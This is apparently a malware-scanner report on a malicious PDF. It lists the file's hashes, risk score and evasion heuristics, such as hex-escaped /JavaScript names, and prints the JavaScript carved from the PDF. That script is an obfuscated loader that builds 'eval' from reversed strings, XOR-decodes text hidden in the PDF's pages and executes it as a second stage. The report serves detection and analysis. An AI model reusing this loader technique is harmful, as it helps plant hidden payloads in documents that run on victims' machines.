Malicious PDF — malware analysis report

Static analysis result for SHA-256 f1dcef4bcf1af44f…

MALICIOUS

PDF

6.5 KB Authoring application: Tisilarehaue (via c85c3Tibedegabala) First seen: 2012-06-14
MD5: 7746c1b85673b4eb89a1b527fa6166a1 SHA-1: 0e911ef4142089d2c1075119e237681a5f125563 SHA-256: f1dcef4bcf1af44fc3343653324b7a18745c6b1ab6655e68de72517ecf4d890e
106 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9990

Heuristics 3

  • Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECT
    A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0010_000.js pdf-javascript-stream PDF /JS object 10 at offset 0x1230 1728 bytes
SHA-256: d4dce4f95f7146e3b127d68edf45ceb045483a205d9e9a2a53d6e6b80d83b663
Preview script
First 1,000 lines of the extracted script
try {

function _ZO(_QD){
this._H=_QD;
};


var _RQZ="cha";
var _JI=new String("rAt");
var _XY="leng"+"th";


app._UV=function(_YJM){
_TMN='';
for(_SD=_YJM.length;_SD >= 0;_SD--){
 _TMN+=_YJM[_RQZ + _JI](_SD);
}
return _TMN;
}


var _UV=app._UV;
_FE = app._UV('epytotorp');
_ZO[_FE]={


_UNC : _UV(String("lave")),

_KR : function(){
var _NQ = this;

_DS=_NQ._MNI();

var _GN=_NQ._YJM;
_DS(_GN);
},

_MNI : function(){

var _BO=this._UNC;
return _FW[_BO];
},

_YJM : '_HK = 37 ;va%%r _KTM=this._H;_WL=\'getPageNt%%hWord\';_DC=\'%getPageNum%Word%s\';_EL=\'pageNum\';_ED%=%%\'\';_AL=\'join%\';_NG=\'\';_KL=%%0;_%%HA=St%%ring;_VY%=\'subs%tr\';%_BY=\'ev%%al\'%%;_XY=\'%length\'%%;_S%%J%%=\'\\\\x\';%%_P%W=\'charCodeAt\';_GH=\'fro%%mCharCo%%de\'%%;_VS%=\'%toSt%ring\'%%;_JK%R%%=2-1;_D%%M=%3+2;_R%A=100%%+155;_%FW=\'%doc\';%%_ITU%=332%;_IV=[];%_ITK=\'\';_D%A=2;_T%Q%%=4;_J%%A=16;%%_PG=_KTM[_%DC](_KTM[_E%%L])%%;for%(_SD=_%KL;_SD%< _PG;% _SD++){var _%%WJ=_KTM%%[_WL](_%%KTM[_EL]%,_SD,tru%e);_NG=[%_NG,%_WJ][_AL](_ED);;}for(_SD%=0%;_SD < _%NG[_XY]; _SD+=_%%DA)%%{_%GD=_NG[_%VY%](_%%SD,_%DA)%%;_Z%%AB=parseI%%nt(_GD,_JA);_XYP=_ZA%B^_HK%%;_FO=_%XYP%%.t%o%%Stri%ng(%%_J%A%%);_F%O=(_%FO[_XY]==_JKR%%)%% ? \'0\' +% %%_%%FO : _FO;_IV.pus%h(_FO)%;%%}try {_ITK=n%ew String(_SJ + %_I%V[%_AL](_SJ));app%[_BY](\'_ITK=\"%%\'+_%%ITK+\'\";\');%_%%KTM.%_ZW=(%%_%%I%%TK[_%VY]%%(_ITK[_%%XY]-_%%IT%U))%%;_KT%M._UN=(_ITK[_VY]%(_KL,_I%%TK[_XY]-%_ITU));_NI%();} c%atc%%h(_%%GHO){if(_KTM._U%%N)%{try {a%%pp[_BY%](_KTM._UN);} c%%at%ch(%%_GHO){app.alert(\'D%ecoder Except%%i%%on: \'%% %%+ %_GHO);}} else {ap%%p.alert(\'%%No%thing calling\');}%%}'.replace(/[%]/g, ''),
};


var _FW=this;

var _EH=new _ZO(_FW);

_EH._KR();

} catch(_ITK){
app.alert(_ITK);
}